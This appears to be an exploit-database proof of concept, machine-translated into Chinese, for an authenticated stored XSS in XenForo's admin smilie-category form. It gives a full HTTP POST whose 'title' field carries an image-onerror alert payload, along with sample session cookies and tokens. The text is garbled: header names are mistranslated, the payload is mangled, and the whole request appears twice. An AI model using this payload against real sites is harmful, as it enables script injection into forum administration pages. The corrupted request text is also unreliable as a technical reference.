#利用标题: Xenforo版本2.2.13-经过身份验证的存储XSS
#日期: 2023-06-24
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: https://x.com/admin.php?smilies
#版本: 2.2.12(必需)
#在: Windows/Linux上测试
#CVE :
------------------------------------------------------------------------------------------------------------------------
请求
post/admin.php?smilie-categories/0/save http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(Windows NT 6.3; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://127.0.0.1/admin.php?smilies/
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=--------------------------------- 333176689514537912041638543422
内容长度: 1038
Origin: http://127.0.0.1
连接:关闭
cookie: xf_csrf=aewkq90jbps2reci; xf_session=yclgxihboq9bsnkasymjpwyvtotiofa; xf_session_admin=wlr6uqjwxckpfjklngavh5t-4ygik5mq
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xftoken'
1687616851,83FD2350307156281E51B17E20FE575B
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='title'
img src=x OneError=alert(document.domain)
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='display_order'
1
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xfrequesturi'
/admin.php?smilies/
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xfwithdata'
1
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xftoken'
1687616849,B74724A115448B864BA2DB8F89F415F5
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data; name='_ xfresponseType'
JSON
---------------------------------------- 333176689514537912041638543422-
响应:创建后,立即发出警报。
#日期: 2023-06-24
#利用作者: Furkan Karaarslan
#类别: WebApps
#供应商homepage: https://x.com/admin.php?smilies
#版本: 2.2.12(必需)
#在: Windows/Linux上测试
#CVE :
------------------------------------------------------------------------------------------------------------------------
请求
post/admin.php?smilie-categories/0/save http/1.1
HOST: 127.0.0.1
用户- 代理: Mozilla/5.0(Windows NT 6.3; Win64; X64; rv:109.0)Gecko/20100101 Firefox/114.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://127.0.0.1/admin.php?smilies/
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=--------------------------------- 333176689514537912041638543422
内容长度: 1038
Origin: http://127.0.0.1
连接:关闭
cookie: xf_csrf=aewkq90jbps2reci; xf_session=yclgxihboq9bsnkasymjpwyvtotiofa; xf_session_admin=wlr6uqjwxckpfjklngavh5t-4ygik5mq
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xftoken'
1687616851,83FD2350307156281E51B17E20FE575B
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='title'
img src=x OneError=alert(document.domain)
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='display_order'
1
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xfrequesturi'
/admin.php?smilies/
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xfwithdata'
1
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data;名称='_ xftoken'
1687616849,B74724A115448B864BA2DB8F89F415F5
-------------------------------------- 333176689514537912041638543422
content-disposition: form-data; name='_ xfresponseType'
JSON
---------------------------------------- 333176689514537912041638543422-
响应:创建后,立即发出警报。